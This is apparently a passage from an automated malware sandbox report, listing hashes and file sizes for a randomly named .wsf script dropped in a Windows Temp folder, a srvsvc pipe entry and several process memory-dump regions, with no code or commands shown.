bdbe49fda66ec500fd8e7dc38dad8acf09115bed

SHA256
69b892448f4d0dd5384866ce1e8383cb0a95e6bde435e75068628546fa00c618

SHA512
d054f73a863c5d596e829a7553ff21951e213d934b67730f8af199388e7f29b3d2aed301e4664605b5ae33a3d7939d87f581a10a2c8d5b9aed56035b521e7839

Download Submit
C:\Windows\Temp\OrbPdMUPlnYWuuDN\IZsrEunH\nEukBecksDsrAYPv.wsf
Filesize
9KB

MD5
29fe03fcb9d59280fb706177eeb62f47

SHA1
be42316ea918a318164cc0579721c20fc5bcbdac

SHA256
e3dce70cfd7e03ae9b201333139fd25664960615080ce695ceab6ed2abab29ee

SHA512
dce95c767ee0dacbb979fa1c134d150b07a75671fff091c02e9f1f5f84a470795ebe5200ccdbf1ea591b448a2bfd582ad26944b583782565eb5e62e1e6b09a4a

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1556-41-0x000000001B7B0000-0x000000001BA92000-memory.dmp

Filesize
2.9MB

Download
memory/1924-31-0x0000000076C90000-0x0000000076DAF000-memory.dmp

Filesize
1.1MB

Download
memory/1924-32-0x0000000076DB0000-0x0000000076EAA000-memory.dmp

Filesize
1000KB

Download
memory/1976-53-0x0000000003F90000-0x0000000004015000-memory.dmp

Filesize
532KB

Download
memory/1976-89-0x0000000003DB0000-0x0000000003E15000-memory.dmp

Filesize
404KB

Download
memory/1976-2-0x0000000010000000-0x00000000105D3000-memory.dmp

Filesize
5.8MB

Download
memory/2516-12-0x00000000021D0000-0x00000000021D8000-memory.dmp

Filesize
32KB

Download
memory/2516-11-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2632-23-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/2632-22-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download